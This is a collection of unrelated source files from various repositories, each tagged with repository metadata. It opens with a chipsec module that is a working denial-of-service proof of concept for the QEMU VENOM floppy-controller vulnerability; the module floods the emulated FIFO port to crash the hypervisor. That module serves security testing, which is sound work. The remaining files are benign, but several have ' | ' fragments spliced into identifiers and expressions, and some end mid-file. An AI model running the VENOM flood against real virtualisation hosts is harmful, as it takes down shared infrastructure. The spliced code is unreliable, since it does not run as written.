#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#chipsec@intel.com
#
"""
QEMU VENOM vulnerability DoS PoC test
Module is based on http://bluereader.org/article/41518389
which is based on PoC by Marcus Meissner (https://marc.info/?l=oss-security&m=143155206320935&w=2)
Usage:
``chipsec_main.py -i -m tools.vmm.venom``
"""
from chipsec.module_common import *
_MODULE_NAME = 'venom'
FDC_PORT_DATA_FIFO = 0x3F5
ITER_COUNT = 0x10000000
FDC_CMD_WRVAL = 0x42
FD_CMD = 0x8E # FD_CMD_DRIVE_SPECIFICATION_COMMAND # FD_CMD_READ_ID = 0x0A
class venom (BaseModule):
    """Denial-of-service proof of concept for the QEMU VENOM floppy
    controller vulnerability; run only against disposable guests."""
    def venom_impl( self ):
        """Issue the FDC drive-specification command, then flood the
        FDC data FIFO with ITER_COUNT parameter bytes to overrun the
        emulated controller's buffer.  Always returns True: success
        means only that the writes were issued, the VMM crash must be
        observed on the host side."""
        self.cs.io.write_port_byte( FDC_PORT_DATA_FIFO, FD_CMD )
        for i in range( ITER_COUNT ):
            self.cs.io.write_port_byte( FDC_PORT_DATA_FIFO, FDC_CMD_WRVAL )
        return True
    def run( self, module_argv ):
        """Module entry point invoked by chipsec_main; module_argv is
        unused."""
        self.logger.start_test( "QEMU VENOM vulnerability DoS PoC" )
        return self.venom_impl()
|
creasyw/IMTAphy | modules/nl/ip/PyConfig/ip/Tunnel.py | Python | gpl-2.0 | 3,273 | 0.001833 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22 | 242
# email: info@openwns.org
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it | and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns
from openwns.node import Component
from Logger import Logger
class TunnelExitComponent(Component):
    """Endpoint of an IP tunnel.

    The component acts both as an nl::DataHandler for IP-encapsulated
    packets and as a dll::Notification service: packets arriving through
    the nl::DataHandler are decapsulated and re-injected into the IP
    layer via the dll::Notification service.
    """
    nameInComponentFactory = "ip.tunnelExit"
    """The name within the C++ Static Factory for Components"""

    logger = None
    """ Logger instance """

    ipNotification = None
    """ Name of the ipNotification service """

    dllNotification = "ip.__internal__.TunnelExitComponentNotification"
    """ Name of the dllNotification service """

    def __init__(self, _node, _name, ipNotification):
        """ Set up the tunnel exit on the given node.
        @param _node : The parent node of this component
        @type _node : L{wns.Node.Node}
        @param _name : The components name
        @type _name : string
        @param ipNotification : Name of the ipNotification service
        @type ipNotification : string
        """
        super(TunnelExitComponent, self).__init__(_node, _name)
        self.dllNotification = "ip.__internal__.TunnelExitComponentNotification"
        self.ipNotification = ipNotification
        self.logger = Logger("TUN", True, _node.logger)
class TunnelEntryComponent(Component):
    """Configuration for the entry point of an IP tunnel, holding the
    tunnel's entry and exit addresses and the IP service name."""
    nameInComponentFactory = "ip.tunnelEntry"

    logger = None
    tunnelEntryAddress = None
    tunnelExitAddress = None
    dataTransmission = None
    ipService = None

    def __init__(self, _node, _name, tunnelEntryAddress, tunnelExitAddress, ipService):
        """ Set up the tunnel entry on the given node.
        @param _node : parent node of this component
        @param _name : component name; the data-transmission service is
                       registered under "tun" + str(_name)
        @param tunnelEntryAddress : address at the tunnel's entry side
        @param tunnelExitAddress : address at the tunnel's exit side
        @param ipService : name of the IP service to use
        """
        super(TunnelEntryComponent, self).__init__(_node, _name)
        self.ipService = ipService
        self.tunnelEntryAddress = tunnelEntryAddress
        self.tunnelExitAddress = tunnelExitAddress
        self.dataTransmission = "tun" + str(_name)
        self.logger = Logger("TUN", True, _node.logger)
|
alexarnautu/deenux | src/deenuxapi/deezer/model/Track.py | Python | gpl-3.0 | 1,503 | 0.001331 | from src.deenuxapi.deezer.Model import Model
from src.deenuxapi.deezer.model.Artist import Artist
class Track(Model):
    """A Deezer track: id (held by Model), title, artist and duration."""

    def __init__(self, id: int, title: str, artist: Artist, duration: int = -1):
        """Create a track.

        :param id: track's ID
        :param title: track's full title
        :param artist: track's artist
        :param duration: track's duration in seconds (-1 when unknown)
        """
        super().__init__(id)
        self.__title = title
        self.__artist = artist
        self.__duration = duration

    @staticmethod
    def map(obj):
        """Build a Track (with its nested Artist) from a decoded API dict."""
        artist = Artist(
            id=obj['artist']['id'],
            name=obj['artist']['name']
        )
        return Track(
            id=obj['id'],
            title=obj['title'],
            duration=obj['duration'],
            artist=artist
        )

    def __str__(self):
        return f'{self.__artist.name} - {self.__title}'

    # Accessors.

    @property
    def title(self):
        """The track's full title."""
        return self.__title

    @title.setter
    def title(self, title: str):
        self.__title = title

    @property
    def artist(self):
        """The track's Artist."""
        return self.__artist

    @artist.setter
    def artist(self, artist: Artist):
        self.__artist = artist

    @property
    def duration(self):
        """Duration in seconds (-1 when unknown)."""
        return self.__duration

    @duration.setter
    def duration(self, duration: int):
        self.__duration = duration
|
daneoshiga/agoracommuns | agoracommuns/agoracommuns/core/tests/test_models.py | Python | mit | 582 | 0 | # -*- coding: utf-8 -*-
from django.test import TestCase
from model_mommy import mommy
from core.models import Agenda, Deliberation
class CoreModelsTests(TestCase):
def test_agenda_create(self):
agenda = mommy.make(Agenda)
self.assertTrue(isinstance(agenda, Agenda))
self.assertEqual(agenda.__unicode__(), agenda.title)
def test_de | liberation_create(self):
deliberation = mommy.make(Deliberation | )
self.assertTrue(isinstance(deliberation, Deliberation))
self.assertEqual(deliberation.__unicode__(), deliberation.proposal)
|
xutian/avocado-vt | virttest/tests/unattended_install.py | Python | gpl-2.0 | 63,456 | 0.000993 | from __future__ import division
import logging
import time
import re
import os
import tempfile
import threading
import shutil
import stat
import xml.dom.minidom
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from avocado.core import exceptions
from avocado.utils import iso9660
from avocado.utils import process
from avocado.utils import crypto
from avocado.utils import download
from virttest import virt_vm
from virttest import asset
from virttest import utils_disk
from virttest import qemu_monitor
from virttest import remote
from virttest import syslog_server
from virttest import http_server
from virttest import data_dir
from virttest import utils_net
from virttest import utils_test
from virttest import utils_misc
from virttest import funcatexit
from virttest import storage
from virttest import error_context
from virttest import qemu_storage
from virttest.compat_52lts import decode_to_text
# Whether to print all shell commands called
DEBUG = False
_url_auto_content_server_thread = None
_url_auto_content_server_thread_event = None
_unattended_server_thread = None
_unattended_server_thread_event = None
_syslog_server_thread = None
_syslog_server_thread_event = None
def start_auto_content_server_thread(port, path):
    """Start the auto-content HTTP server thread once (no-op if running)."""
    global _url_auto_content_server_thread
    global _url_auto_content_server_thread_event
    if _url_auto_content_server_thread is not None:
        return
    _url_auto_content_server_thread_event = threading.Event()
    _url_auto_content_server_thread = threading.Thread(
        target=http_server.http_server,
        args=(port, path, terminate_auto_content_server_thread))
    _url_auto_content_server_thread.start()
def start_unattended_server_thread(port, path):
    """Start the unattended-install HTTP server thread once (no-op if running)."""
    global _unattended_server_thread
    global _unattended_server_thread_event
    if _unattended_server_thread is not None:
        return
    _unattended_server_thread_event = threading.Event()
    _unattended_server_thread = threading.Thread(
        target=http_server.http_server,
        args=(port, path, terminate_unattended_server_thread))
    _unattended_server_thread.start()
def terminate_auto_content_server_thread():
    """Termination callback for the auto-content HTTP server.

    :returns: True only once the server thread exists and its stop event
        has been set; False otherwise.
    """
    global _url_auto_content_server_thread
    global _url_auto_content_server_thread_event
    if _url_auto_content_server_thread is None:
        return False
    if _url_auto_content_server_thread_event is None:
        return False
    # is_set() is the PEP 8 spelling of the deprecated isSet() alias; the
    # if/return-True/return-False chain collapses to the boolean itself.
    return _url_auto_content_server_thread_event.is_set()
def terminate_unattended_server_thread():
    """Termination callback for the unattended-install HTTP server.

    :returns: True only once the server thread exists and its stop event
        has been set; False otherwise.
    """
    global _unattended_server_thread, _unattended_server_thread_event
    if _unattended_server_thread is None:
        return False
    if _unattended_server_thread_event is None:
        return False
    # is_set() is the PEP 8 spelling of the deprecated isSet() alias.
    return _unattended_server_thread_event.is_set()
class RemoteInstall(object):

    """
    Represents an install http server that we can master according to our
    needs.
    """

    def __init__(self, path, ip, port, filename):
        self.path = path
        # Start from a clean, freshly created serving directory.
        utils_disk.cleanup(self.path)
        os.makedirs(self.path)
        self.ip = ip
        self.port = port
        self.filename = filename
        start_unattended_server_thread(self.port, self.path)

    def get_url(self):
        """Return the URL under which the answer file is served."""
        return 'http://{0}:{1}/{2}'.format(self.ip, self.port, self.filename)

    def get_answer_file_path(self, filename):
        """Return the on-disk path of *filename* inside the served dir."""
        return os.path.join(self.path, filename)

    def close(self):
        """Make the served directory world readable and log the URL."""
        mode = (stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
                stat.S_IROTH | stat.S_IXOTH)
        os.chmod(self.path, mode)
        logging.debug("unattended http server %s successfully created",
                      self.get_url())
class UnattendedInstallConfig(object):
"""
Creates a floppy disk image that will contain a config file for unattended
OS install. The parameters to the script are retrieved from environment
variables.
"""
def __init__(self, test, params, vm):
"""
Sets class attributes from test parameters.
:param test: QEMU test object.
:param params: Dictionary with test parameters.
"""
root_dir = data_dir.get_data_dir()
self.deps_dir = os.path.join(test.virtdir, 'deps')
self.unattended_dir = os.path.join(test.virtdir, 'unattended')
self.results_dir = test.debugdir
self.params = params
self.attributes = ['kernel_args', 'finish_program', 'cdrom_cd1',
'unattended_file', 'medium', 'url', 'kernel',
'initrd', 'nfs_server', 'nfs_dir', 'install_virtio',
'floppy_name', 'cdrom_unattended', 'boot_path',
'kernel_params', 'extra_params', 'qemu_img_binary',
'cdkey', 'finish_program', 'vm_type',
'process_check', 'vfd_size', 'cdrom_mount_point',
'floppy_mount_point', 'cdrom_virtio',
'virtio_floppy', 're_driver_match',
're_hardware_id', 'driver_in_floppy', 'vga',
'unattended_file_kernel_param_name']
for a in self.attributes:
setattr(self, a, params.get(a, ''))
# Make finish.bat work well with positional arguments
if not self.process_check.strip(): # pylint: disable=E0203
self.process_check = '""' # pylint: disable=E0203
# Will setup the virtio attributes
v_attributes = ['virtio_floppy', 'virtio_scsi_path',
'virtio_storage_path', 'virtio_network_path',
'virtio_balloon_path', 'virtio_viorng_path',
'virtio_vioser_path', 'virtio_pvpanic_path',
'virtio_vioinput_path',
'virtio_oemsetup_id',
'virtio_network_installer_path',
'virtio_balloon_installer_path',
'virtio_qxl_installer_path']
for va in v_attributes:
setattr(self, va, params.get(va, ''))
self.tmpdir = test.tmpdir
self.qemu_img_binary = utils_misc.get_qemu_img_binary(params)
def get_unattended_file(backend):
providers = asset.get_test_provider_names(backend)
if not providers:
return
for provider_name in providers:
provider_info = asset.get_test_provider_info(provider_name)
if backend not in provider_info["backends"]:
continue
if "path" not in provider_info["backends"][backend]:
continue
path = provider_info["backends"][backend]["path"]
tp_unattended_file = os.path.join(path, self.unattended_file)
if os.path.exists(tp_unattended_file):
# Using unattended_file from test-provider
unattended_file = tp_unattended_file
# Take the first matched
| return unattended_file
if getattr(self, 'unattended_file'):
# Fail-back to general unattended_file
unattended_file = os.path.join(test.virtdir, self.unattended_file)
for backend in asset.get_known_backends():
found_file | = get_unattended_file(backend)
if found_file:
unattended_file = found_file
break
self.unattended_file = unattended_file
if getattr(self, 'finish_program'):
self.finish_program = os.path.join(test.virtdir,
self.finish_program)
if getattr(self, 'cdrom_cd1'):
self.cdrom_cd1 = os.path.join(root_dir, self.cdrom_cd1)
self.cdrom_cd1_mount = tempfile.mkdtemp(prefix='cdrom_cd1_',
dir=self.tmpdir)
if getattr(self, 'cdrom_unattended'):
self.cdrom_unattended = os.path.join(root_dir,
self.cdrom_unattended)
if getattr(self, 'virtio_ |
orionzhou/robin | old/nwk2txt.py | Python | gpl-2.0 | 718 | 0.01532 | #!/usr/bin/env python
import os
import os.path as op
import sys
import argparse
from Bio import Phylo
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description = 'extract leaf(tip) labels from newick tree file'
    )
    parser.add_argument(
        'fi', nargs = '?', help = 'input file (newick)'
    )
    parser.add_argument(
        'fo', nargs = '?', help = 'output file (txt)'
    )
    args = parser.parse_args()
    (fi, fo) = (args.fi, args.fo)

    # Parse the tree once and collect the terminal (leaf/tip) names.
    # (Dataset artifact repaired: format string is "newick".)
    tree = Phylo.read(fi, "newick")
    labels = [leaf.name for leaf in tree.get_terminals()]

    # Write one label per line, in reverse traversal order; the context
    # manager closes the handle even if a write fails.
    with open(fo, "w") as fho:
        for label in reversed(labels):
            fho.write(label + "\n")
|
praekelt/vumi-go | go/apps/dialogue/vumi_app.py | Python | bsd-3-clause | 2,008 | 0 | # -*- test-case-name: go.apps.dialogue.tests.test_vumi_app -*-
import pkg_resources
import json
from vxsandbox import SandboxResource
from go.apps.jsbox.vumi_app import JsBoxConfig, JsBoxApplication
from go.apps.dialogue.utils import dialogue_js_config
class PollConfigResource(SandboxResource):
    """Resource that provides access to dialogue conversation config."""

    def _get_config(self, conversation):
        """Return the virtual sandbox config for the given dialogue.

        :returns:
            JSON string containing the configuration dictionary.
        """
        return json.dumps(dialogue_js_config(conversation))

    def _get_poll(self, conversation):
        """Return the poll definition from the given dialogue.

        :returns:
            JSON string containing the poll definition.
        """
        return conversation.config.get("poll")

    def handle_get(self, api, command):
        """Serve config lookups made from inside the sandbox."""
        key = command.get("key")
        if key is None:
            return self.reply(command, success=False)
        conversation = self.app_worker.conversation_for_api(api)
        handlers = {
            "config": self._get_config,
            "poll": self._get_poll,
        }
        if key in handlers:
            value = handlers[key](conversation)
        else:
            # Matches what go.apps.jsbox.vumi_app.ConversationConfigResource
            # returns for unknown keys.
            value = {}
        return self.reply(command, value=value, success=True)
class DialogueConfig(JsBoxConfig):
    # Cache slot for the javascript bundle; the first read stores the
    # result as an *instance* attribute, shadowing this class default.
    _cached_javascript = None

    @property
    def javascript(self):
        # Lazily read the dialogue sandbox javascript shipped inside the
        # package and memoize it so the resource is loaded at most once.
        if self._cached_javascript is None:
            self._cached_javascript = pkg_resources.resource_string(
                "go.apps.dialogue", "vumi_app.js")
        return self._cached_javascript
class DialogueApplication(JsBoxApplication):
    """JsBox application specialised for dialogue conversations."""

    # Use the dialogue-specific config (bundled vumi_app.js) instead of
    # the generic JsBox one.
    CONFIG_CLASS = DialogueConfig

    worker_name = 'dialogue_application'

    def get_jsbox_js_config(self, conv):
        # Dialogue conversations derive their sandbox config from the
        # conversation's poll definition.
        return dialogue_js_config(conv)
|
aneumeier/category | oldcategory/urls.py | Python | bsd-3-clause | 1,181 | 0.008467 | #! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
from django.conf.urls import url, patterns, include
from category.views import CategoryListView, CategoryCreateView, CategoryDetailView, CategoryUpdateView
from category.views import TagListView, TagDetailView, TagCreateView, TagUpdateView
# Category routes.
urlpatterns = patterns('',
    url(r'^category/$', CategoryListView.as_view(), name="category-home"),
    url(r'^category/page/(?P<page>\w+)/$', CategoryListView.as_view(), name="category-home-paginated"),
    url(r'^category/add/$', CategoryCreateView.as_view(), name="category-add"),
    url(r'^category/(?P<slug>\w+)/$', CategoryDetailView.as_view(), name="category-view"),
    url(r'^category/(?P<slug>\w+)/update$', CategoryUpdateView.as_view(), name="category-update"),
)

# Tag routes.  Fixed a stray space in the index pattern (was r'^tag /$'),
# which made the normal /tag/ URL unreachable and was inconsistent with
# every other tag route below.
urlpatterns += patterns('',
    url(r'^tag/$', TagListView.as_view(), name="tag-home"),
    url(r'^tag/page/(?P<page>\w+)/$', TagListView.as_view(), name="tag-home-paginated"),
    url(r'^tag/add/$', TagCreateView.as_view(), name="tag-add"),
    url(r'^tag/(?P<slug>[\w-]+)/$', TagDetailView.as_view(), name="tag-view"),
    url(r'^tag/(?P<id>\d+)/update/$', TagUpdateView.as_view(), name="tag-update"),
)
|
Lekensteyn/buildbot | master/buildbot/process/results.py | Python | gpl-2.0 | 2,689 | 0.000744 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from future.utils import lrange
# Numeric result codes shared across buildbot; list(range(7)) is exactly
# equivalent to future.utils.lrange(7) on both Python 2 and 3, without
# needing the third-party helper at this site.
ALL_RESULTS = list(range(7))
SUCCESS, WARNINGS, FAILURE, SKIPPED, EXCEPTION, RETRY, CANCELLED = ALL_RESULTS
Results = ["success", "warnings", "failure", "skipped", "exception", "retry", "cancelled"]


def statusToString(status):
    """Return the human-readable name of a numeric result code.

    :param status: integer result code, or None for an unfinished build.
    :returns: the lower-case status name, "not finished" for None, or
        "Invalid status" for out-of-range codes.
    """
    if status is None:
        return "not finished"
    if status < 0 or status >= len(Results):
        return "Invalid status"
    return Results[status]
def worst_status(a, b):
    """Return the more severe of the two result codes *a* and *b*.

    Severity, worst first: CANCELLED, RETRY, EXCEPTION, FAILURE,
    WARNINGS, SUCCESS, SKIPPED.
    """
    severity_order = (CANCELLED, RETRY, EXCEPTION, FAILURE,
                      WARNINGS, SUCCESS, SKIPPED)
    for status in severity_order:
        if status in (a, b):
            return status
def computeResultAndTermination(obj, result, previousResult):
    """Fold a new step *result* into *previousResult* using *obj*'s flags.

    :param obj: object carrying the ResultComputingConfigMixin flags
        (haltOnFailure, flunkOnFailure, warnOnFailure, ...).
    :param result: result code of the step that just finished.
    :param previousResult: overall result accumulated so far.
    :returns: tuple ``(result, terminate)`` -- the combined overall result
        and whether the caller should stop running further steps.
    """
    possible_overall_result = result
    terminate = False
    if result == FAILURE:
        # Successive flag checks deliberately overwrite each other, so the
        # strongest applicable flag (flunkOnFailure) wins last.
        if not obj.flunkOnFailure:
            possible_overall_result = SUCCESS
        if obj.warnOnFailure:
            possible_overall_result = WARNINGS
        if obj.flunkOnFailure:
            possible_overall_result = FAILURE
        if obj.haltOnFailure:
            terminate = True
    elif result == WARNINGS:
        if not obj.warnOnWarnings:
            possible_overall_result = SUCCESS
        else:
            possible_overall_result = WARNINGS
        if obj.flunkOnWarnings:
            possible_overall_result = FAILURE
    elif result in (EXCEPTION, RETRY, CANCELLED):
        # Unrecoverable outcomes always stop the run, unmodified by flags.
        terminate = True
    # The overall result can only get worse, never better.
    result = worst_status(previousResult, possible_overall_result)
    return result, terminate
class ResultComputingConfigMixin(object):
    """Mixin holding the flags consumed by computeResultAndTermination."""

    # Stop the build immediately when this step fails.
    haltOnFailure = False
    # Treat this step's warnings as an overall FAILURE.
    flunkOnWarnings = False
    # Treat this step's failure as an overall FAILURE.
    flunkOnFailure = True
    # Treat this step's warnings as overall WARNINGS.
    warnOnWarnings = False
    # Downgrade this step's failure to overall WARNINGS.
    warnOnFailure = False

    # Names of the configurable flags above, for config machinery.
    resultConfig = [
        "haltOnFailure",
        "flunkOnWarnings",
        "flunkOnFailure",
        "warnOnWarnings",
        "warnOnFailure",
    ]
|
CELMA-project/CELMA | celma/testScan.py | Python | lgpl-3.0 | 1,495 | 0.040803 | #!/usr/bin/env python
"""Driver which checks that celma is properly running."""
import os, sys
# If we add to sys.path, then it must be an absolute path
commonDir = os.path.abspath("./../common")
# Sys path is a list of system paths
sys.path.append(commonDir)
from CELMAPy.scanDriver import ScanDriv | er
from bout_runners import basic_runner
|
directory = "CSDXMagFieldScanAr"
# Create object
scanB0 = ScanDriver(directory, runner = basic_runner)
# Set the scan
# NOTE: The scan must be in descending order in order for the growth
# rates post-processing to work
B0 = ( 1.0e-1)
Lx = ( 7.8633)
Ly = (275.2144)
scanParameters = ("B0", "Lx", "Ly")
series_add = (\
("input", "B0", B0),\
("geom" , "Lx", Lx),\
("geom" , "Ly", Ly),\
)
# Set the options
scanB0.setMainOptions(\
scanParameters = scanParameters,\
series_add = series_add ,\
theRunName = directory ,\
make = False ,\
boutRunnersNoise = {"vortD":1e-6},\
)
scanB0.setInitOptions (timestep = 1e-10, nout = 2)
scanB0.setExpandOptions (timestep = 1e-10, nout = 2)
scanB0.setLinearOptions (timestep = 1e-10, nout = 2)
scanB0.setTurbulenceOptions(timestep = 1e-10, nout = 2)
# Set common runner options
scanB0.setCommonRunnerOptions(nproc = 4, cpy_source = True)
# Run
scanB0.runScan()
|
ruibarreira/linuxtrail | usr/lib/python3.4/asyncio/test_utils.py | Python | gpl-3.0 | 11,895 | 0.000588 | """Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def dummy_ssl_context():
    """Return a throwaway SSLContext, or None when ssl is unavailable."""
    return None if ssl is None else ssl.SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop):
    """Run a single no-op coroutine to completion on *loop*."""
    @coroutine
    def once():
        pass
    gen = once()
    t = loop.create_task(gen)
    # Don't log a warning if the task is not done after run_until_complete().
    # It occurs if the loop is stopped or if a task raises a BaseException.
    t._log_destroy_pending = False
    try:
        loop.run_until_complete(t)
    finally:
        # Close the coroutine object explicitly so it doesn't warn when the
        # loop stopped before the task could finish.
        gen.close()
def run_until(loop, pred, timeout=30):
    """Spin *loop* in 1ms sleeps until pred() is true or *timeout* expires.

    Raises futures.TimeoutError when the deadline passes first; a timeout
    of None waits forever.
    """
    deadline = time.time() + timeout
    while not pred():
        if timeout is not None:
            timeout = deadline - time.time()
            if timeout <= 0:
                raise futures.TimeoutError()
        loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
    """Run the already-ready callbacks of *loop* exactly once.

    loop.stop() schedules _raise_stop_error() and run_forever() runs until
    the _raise_stop_error() callback.  This won't work if the test waits
    for some IO events, because _raise_stop_error() runs before any of the
    IO event callbacks.
    """
    loop.stop()
    loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
    """WSGI request handler that produces no logging output."""

    def get_stderr(self):
        # Hand the WSGI machinery a throwaway buffer instead of real stderr.
        return io.StringIO()

    def log_message(self, format, *args):
        # Deliberately silent: keep test output free of per-request noise.
        pass
class SilentWSGIServer(WSGIServer):
    """WSGI test server that swallows per-request handler errors."""

    def handle_error(self, request, client_address):
        # Ignore tracebacks from aborted client connections during tests.
        pass
class SSLWSGIServerMixin:
    """Mixin wrapping each accepted request socket in server-side SSL."""

    def finish_request(self, request, client_address):
        # The relative location of our test directory (which
        # contains the ssl key and certificate files) differs
        # between the stdlib and stand-alone asyncio.
        # Prefer our own if we can find it.
        here = os.path.join(os.path.dirname(__file__), '..', 'tests')
        if not os.path.isdir(here):
            here = os.path.join(os.path.dirname(os.__file__),
                                'test', 'test_asyncio')
        keyfile = os.path.join(here, 'ssl_key.pem')
        certfile = os.path.join(here, 'ssl_cert.pem')
        # NOTE(review): ssl.wrap_socket() was deprecated in 3.7 and removed
        # in 3.12; acceptable for the Python versions this file targets.
        ssock = ssl.wrap_socket(request,
                                keyfile=keyfile,
                                certfile=certfile,
                                server_side=True)
        try:
            self.RequestHandlerClass(ssock, client_address, self)
            ssock.close()
        except OSError:
            # maybe socket has been closed by peer
            pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
    """TCP WSGI test server that speaks SSL and stays silent."""
    pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
    """Generator serving a one-page WSGI app on *address* in a thread.

    Yields the server object; on resumption shuts the server down and
    joins its thread.  Driven via ``yield from`` inside the public
    context managers below.
    """
    def app(environ, start_response):
        # Minimal WSGI app: every request gets the same plain-text body.
        status = '200 OK'
        headers = [('Content-type', 'text/plain')]
        start_response(status, headers)
        return [b'Test message']

    # Run the test WSGI server in a separate thread in order not to
    # interfere with event handling in the main thread
    server_class = server_ssl_cls if use_ssl else server_cls
    httpd = server_class(address, SilentWSGIRequestHandler)
    httpd.set_app(app)
    httpd.address = httpd.server_address
    server_thread = threading.Thread(target=httpd.serve_forever)
    server_thread.start()
    try:
        yield httpd
    finally:
        httpd.shutdown()
        httpd.server_close()
        server_thread.join()
if hasattr(socket, 'AF_UNIX'):
    # UNIX-domain-socket variants of the test servers (POSIX only).

    class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):

        def server_bind(self):
            # Bind the UNIX socket, then fake the host/port attributes
            # that the HTTP handling code expects to find.
            socketserver.UnixStreamServer.server_bind(self)
            self.server_name = '127.0.0.1'
            self.server_port = 80

    class UnixWSGIServer(UnixHTTPServer, WSGIServer):

        def server_bind(self):
            UnixHTTPServer.server_bind(self)
            self.setup_environ()

        def get_request(self):
            request, client_addr = super().get_request()
            # Code in the stdlib expects that get_request
            # will return a socket and a tuple (host, port).
            # However, this isn't true for UNIX sockets,
            # as the second return value will be a path;
            # hence we return some fake data sufficient
            # to get the tests going
            return request, ('127.0.0.1', '')

    class SilentUnixWSGIServer(UnixWSGIServer):

        def handle_error(self, request, client_address):
            # Quiet variant: ignore per-request errors, like the TCP server.
            pass

    class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
        pass
def gen_unix_socket_path():
    """Return a fresh filesystem path usable for a UNIX-domain socket."""
    tmp = tempfile.NamedTemporaryFile()
    try:
        # The file is deleted on close, leaving its unique name free.
        return tmp.name
    finally:
        tmp.close()


@contextlib.contextmanager
def unix_socket_path():
    """Yield a temporary UNIX socket path, removing the file on exit."""
    path = gen_unix_socket_path()
    try:
        yield path
    finally:
        with contextlib.suppress(OSError):
            os.unlink(path)
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
    """Context manager: WSGI test server on a temporary UNIX socket."""
    with unix_socket_path() as path:
        yield from _run_test_server(address=path, use_ssl=use_ssl,
                                    server_cls=SilentUnixWSGIServer,
                                    server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
    """Context manager: WSGI test server on a TCP socket (port 0 = any)."""
    yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
                                server_cls=SilentWSGIServer,
                                server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
    """Return an instance of *base* with every non-dunder method mocked."""
    namespace = {
        name: MockCallback(return_value=None)
        for name in dir(base)
        if not (name.startswith('__') and name.endswith('__'))
    }
    return type('TestProtocol', (base,) + base.__bases__, namespace)()
class TestSelector(selectors.BaseSelector):
    """Selector stub: records registrations but never reports events."""

    def __init__(self):
        self.keys = {}

    def register(self, fileobj, events, data=None):
        # fd is irrelevant for the stub, so it is always 0.
        self.keys[fileobj] = selectors.SelectorKey(fileobj, 0, events, data)
        return self.keys[fileobj]

    def unregister(self, fileobj):
        return self.keys.pop(fileobj)

    def select(self, timeout):
        # No I/O ever becomes ready in tests.
        return []

    def get_map(self):
        return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
if self._check_on_close:
try:
se |
AIFDR/inasafe | safe/metadata/test/test_hazard_metadata.py | Python | gpl-3.0 | 886 | 0 | # coding=utf-8
"""Test Hazard | Metadata."""
from unittest import TestCase
from safe.common.utilities import unique_filename
from safe.metadata import HazardLayerMetadata
__copyright__ = "Copyright 2016, The InaSAFE Project"
__license__ = "GPL version 3"
__email__ = "info@inasafe.org"
__revision__ = '$Format:%H$'
class TestHazardMetadata(TestCase):

    def test_standard_properties(self):
        """Known metadata keys resolve; unknown keys raise KeyError."""
        metadata = HazardLayerMetadata(unique_filename())

        with self.assertRaises(KeyError):
            metadata.get_property('non_existing_key')

        # 'email' comes from BaseMetadata, the rest from HazardLayerMetadata.
        for key in ('email', 'hazard', 'hazard_category',
                    'continuous_hazard_unit', 'thresholds', 'value_maps'):
            metadata.get_property(key)
|
angea/corkami | wip/MakePE/examples/PE/max_sec.py | Python | bsd-2-clause | 3,885 | 0.003604 | # a generator for a PE with maximum number of section
# 199 sections confirmed working
# Generates max_sec.asm: a NASM source for a PE with SEC_NUMB sections.
# Python 2 script (xrange); dataset " | " artifacts in two template
# strings have been repaired below.
SEC_NUMB = 199
SECTIONS_VSTART = 0x02000

f = open("max_sec.asm", "wt")

